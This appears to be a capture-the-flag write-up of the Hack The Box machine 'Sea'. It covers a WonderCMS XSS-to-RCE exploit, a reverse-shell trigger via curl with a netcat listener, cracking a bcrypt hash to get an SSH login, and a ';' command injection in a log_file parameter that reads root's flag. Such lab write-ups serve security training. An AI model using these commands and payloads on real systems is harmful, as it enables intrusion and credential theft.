Home

Sea – Hack The Box – @lautarovculic

, , , , , ,

User.txt

Let’s discover open ports with nmap

				
					sudo nmap -sV -p- -Pn -vv -T4 --min-rate 5000 10.10.11.28

Output:

				
					PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))

We need add sea.htb to our /etc/hosts file

				
					sudo echo "10.10.11.28 sea.htb" | sudo tee -a /etc/hosts

We can see that there are a contact form

And this is my directory enum output

				
					/.htaccess            (Status: 403) [Size: 199]
/.htpasswd            (Status: 403) [Size: 199]
/.hta                 (Status: 403) [Size: 199]
/0                    (Status: 200) [Size: 3650]
/404                  (Status: 200) [Size: 3341]
/data                 (Status: 301) [Size: 228] [--> http://sea.htb/data/]
/Documents and Settings (Status: 403) [Size: 199]
/home                 (Status: 200) [Size: 3650]
/index.php            (Status: 200) [Size: 3650]
/messages             (Status: 301) [Size: 232] [--> http://sea.htb/messages/]
/plugins              (Status: 301) [Size: 231] [--> http://sea.htb/plugins/]
/Program Files        (Status: 403) [Size: 199]
/reports list         (Status: 403) [Size: 199]
/server-status        (Status: 403) [Size: 199]
/themes               (Status: 301) [Size: 230] [--> http://sea.htb/themes/]

We can confirm that is WonderCMS for
https://github.com/robiso/bike

We can use this exploit

				
					Wondercms 4.3.2 - XSS to RCE                   | multiple/webapps/51805.py

And here is the PoC

PoC

Set a nc on 1234 port
Then, if we run

				
					curl 'http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.33&lport=1234'

And we get the first shell

				
					$ whoami
www-data
$ hostname
sea
$

If we look into /var/www/sea/data/database.js we have this password

				
					$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q

This is a bcrypt, but we need modify this to

				
					$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q

And then, crack it with hashcat

				
					hashcat -m 3200 hash.txt /usr/share/seclists/rockyou.txt

The password is mychemicalromance
Then now, log via ssh

				
					ssh amay@10.10.11.28

And get the user flag

				
					amay@sea:~$ cat user.txt
ffeb1a0a2f65d7459e34b1065edf36e5
amay@sea:~$

Root.txt

We can see that the port 8080 is open, then
We need do a portfoward via ssh

				
					ssh -L 1111:sea.htb:8080 amay@sea.htb

Go to http://localhost:1111
You need use the same amay credentials for access, then

Then intercept the analyze button with burpsuite
And change the file to /root/root.txt and use ; for RCE

				
					log_file=%2Froot%2Froot.txt;cat&analyze_log=

In the response you will see the root flag

I hope you found it useful (:

Leave a Reply

Your email address will not be published. Required fields are marked *